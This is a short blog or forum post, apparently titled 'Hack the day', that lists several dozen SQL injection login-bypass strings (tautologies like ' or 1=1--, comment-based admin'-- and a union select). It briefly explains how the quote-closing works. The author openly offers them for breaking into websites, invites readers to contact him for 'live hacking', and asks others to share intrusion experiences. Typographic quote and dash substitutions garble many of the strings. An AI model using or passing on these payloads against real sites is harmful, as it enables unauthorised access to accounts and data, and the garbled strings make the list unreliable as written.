SQL injection strings : Hack the day
Here I am posting some of the SQL injection strings that you can use to hack into the website.
I have done some practical work out of this, if someone wants to go live hacking using these SQL injection strings, contact to me.
If someone is pro of breaking into venerable systems and sites. please share your expriences/
‘ or 0=0 –
‘ or 0=0 –’
‘ or 0=0 #
” or 0=0 –
” or 0=0 –’
‘” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
” or 1=1–
or 1=1–
‘ or a=a–’
‘ or a=a #
‘ or a=a–
‘ or “a”=”a
‘ or ‘a’='a
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”a
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or ‘a’='a
” or “a”=”a
‘) or (‘a’='a
admin’–
‘ or 1=1–
‘” or 1=1–
‘ union select 1, ‘Eyeless’, ‘ez2do’, 1–
admin’–
administrator’–
superuser’–
test’–
This is the short list but these SQL injection strings are much powerful.
I have another hint :
Some of the SQL supporting system doesn’t support.
For example
” or “a”=”a
‘) or (‘a’='a
on some databases one would work, other wouldn’t.. first one would enclose the username (or pass) in quotes… first it would CLOSE the quotes (making it “”) and then says.. or “a”=”a.. the last quote would be closeing the final a.. and “a”=”a” is always true, so that would be how it works
however, the second uses (‘Username’).. and changing it to say “(”) or (‘a’='a’)”
Enjoy the HACK DAY 
some of the SQL injection string are most used
‘ or 0=0 –’
‘ or 0=0 #
” or 0=0 –
” or 0=0 –’
‘” or 0=0 –
or 0=0 –
‘ or 0=0 #
What i practiced, is hack the day
[Reply]